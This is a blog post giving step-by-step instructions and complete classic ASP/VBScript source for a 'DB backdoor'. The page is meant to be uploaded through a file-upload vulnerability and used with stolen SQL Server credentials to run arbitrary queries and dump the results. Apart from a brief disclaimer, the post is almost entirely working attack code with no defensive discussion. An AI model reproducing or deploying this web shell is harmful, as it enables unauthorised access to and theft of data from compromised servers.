Classic ASP (Active Server Pages) With MS SQL Server DB Backdoor

Disclaimer : The information provided here is to be used for  educational purposes only. The website creator is in no way responsible  for any misuse of the information provided. All of the information in  this website is meant to help the reader develop a hacker defense  attitude in order to prevent the attacks discussed. In no way should you  use the information to cause any kind of damage directly or indirectly.

Assumption
———
1. ASP.Net application is having File Upload vulnerability.
2.We grabbed usename,password,dbname,servername of the Database.
3. Application is not allowing the user to upload files with more than 3 character extension.

Let’s get started.

1. Create asp page
Create asp page without code embedded with VB Script.

<% @Language=VBScript %>
<html dir=ltr>
<head>
<title>Classic asp DB Shell</title>
<style>	
.dblabel{width: 26%; float: left; padding: 0 0 4 0; text-align: right;}
.dbText{ width : 50%; float:left; padding: 0 0 4 0;}
</style>
</head>
<body>
<h1>Db Info</h1>
<form method="post">

</form>
</body>
</html>

2. Add basic fields
After adding the empty asp page we need to add input fields which need to be passed to connection string as well as query to be executed.

<div style="width:50%;">
   <div class="dblabel">Server Name : </div>
   <div class="dbText"><input type="text" name="sName" /></div>
   <div class="dblabel">Server Port : </div>
   <div class="dbText"><input type="text" name="sPort" /></div>
   <div class="dblabel">User Name : </div>
   <div class="dbText"><input type="text" name="dbUName" /></div>
   <div class="dblabel">Password : </div>
   <div class="dbText"><input type="text" name="dbPass" /></div>
   <div class="dblabel">Database : </div>
   <div class="dbText"><input type="text" name="dbName" /></div>
   <div class="dblabel">Query :</div>
   <div class="dbText"><textarea name="query" rows="4" cols="50"></textarea></div>
   <div class="dblabel"></div>
   <div class="dbText"><input type="submit" name="submit" value="Run Query"/></div>
</div>

3. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding. After executing the query try to display all records in tabular format.

<%
		Dim fname 
		fname=Request.Form("submit")
		
		Response.Buffer = True 
		On Error Resume Next
		
		Dim host
		Dim port
		Dim user
		Dim password
		Dim database

		host = Request.Form("sName")
		port = Request.Form("sPort")
		user = Request.Form("dbUName")
		password = Request.Form("dbPass")
		database = Request.Form("dbName")
		
		If host <> "" And port <> "" And user <> "" And password <> "" And database <> ""  Then
			Dim conn
			Set conn = Server.CreateObject("ADODB.Connection")
			Dim ds
			ds = host & "," & port
			Dim connString
			connString = "Provider=SQLOLEDB;Data Source=" & ds & ";Network Library=DBMSSOCN;Initial Catalog=" & database & ";User Id=" & user & ";Password=" & password & ";"
			conn.Open connString
			If conn.Errors.Count > 0 Then
				Response.Write "Error: Unable to Connect" & Err.Description
				Response.END
			End If
			
			Dim query
			query = Request.Form("query")
			
			If query <> "" Then
				Set rs = conn.Execute(query)
				If conn.Errors.Count > 0 Then
					Response.Write "Error: " & Err.Description
				Else
					Response.Write "<html><body><table><tr>"
					For Each objField in rs.Fields
						Response.Write "<td>" & objField.Name & "</td>"
					Next
					Response.Write "</tr>"

					While Not rs.EOF
						Response.Write "<tr>"
						For Each objField in rs.Fields
							Response.Write "<td>" & rs(objField.Name) & "</td>"
						Next
						rs.MoveNext
						Response.Write "</tr>"
					Wend
					
					rs.Close
				End If
			End If
			
			conn.Close
			Set conn = Nothing
		End If
	%>

It’s all over. This will establish a connection to MS SQL Server to get records from DB.
Bingo….!!!!

Advertisements

About tvskumar2000

Tvs always cooooool
This entry was posted in DB Backdoor, Hacking and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s